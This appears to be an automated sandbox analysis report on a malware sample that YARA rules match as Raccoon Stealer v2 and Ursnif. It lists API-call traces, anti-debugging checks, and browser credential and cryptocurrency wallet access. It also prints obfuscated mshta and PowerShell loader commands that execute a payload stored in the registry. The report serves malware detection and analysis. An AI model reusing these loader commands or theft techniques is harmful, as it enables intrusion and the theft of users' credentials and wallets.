Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1E12 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF1E12
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFBCEC LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose, 0_2_00AFBCEC
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1968 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW, 0_2_00AF1968
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF3F64 StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF3F64
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF1AFF FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose, 0_2_00AF1AFF
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF4272 StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AF4272
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFC05D LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose, 0_2_00AFC05D
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF3CAC LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF3CAC
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF63BE LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 0_2_00AF63BE
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF5B3D LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose, 0_2_00AF5B3D
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF7F03 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,lstrlen,StrStrA,lstrlen,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,DeleteFileW,LocalFree,DeleteFileW,LocalFree, 0_2_00AF7F03
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF6F99 LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF6F99
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF39F4 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW, 0_2_00AF39F4
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF7248 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree, 0_2_00AF7248

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF100B LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AF100B
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ndam='wscript.shell';resizeto(0,2);eval(new activexobject(ndam).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([system.text.encoding]::ascii.getstring((nhefowhe "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([system.text.encoding]::ascii.getstring((nhefowhe "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Process created: C:\Users\user\AppData\Roaming\XHSRZM23.exe "C:\Users\user\AppData\Roaming\XHSRZM23.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp" "c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp" "c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP" Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree, 0_2_00AF9E92
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 1_2_00401493
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFA0FD cpuid 0_2_00AFA0FD
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_00401A49
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF9FCA LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree, 0_2_00AF9FCA
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFB555 LocalAlloc,GetUserNameW, 0_2_00AFB555
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_004012B0

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.511157759.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.XHSRZM23.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510026391.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.509943695.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.564056482.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.635823652.0000024AC56F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: EJ6FBXJ9Dg.exe, type: SAMPLE
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.EJ6FBXJ9Dg.exe.af0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.65.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.EJ6FBXJ9Dg.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.45.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.62.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.42.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.48.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.53.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.36.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EJ6FBXJ9Dg.exe.97e1d3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.59.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.38.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.50.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.33.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.311564503.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313851264.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312521488.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.314342584.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306122404.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309062982.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312858440.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299025319.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312044300.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307116929.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.314171786.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313465348.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307229333.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311755753.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312701819.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313233665.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313073419.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.303236986.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.320054866.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309934839.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307287486.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310475968.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312379601.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313656413.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.304707306.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299000955.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312199871.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.511157759.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
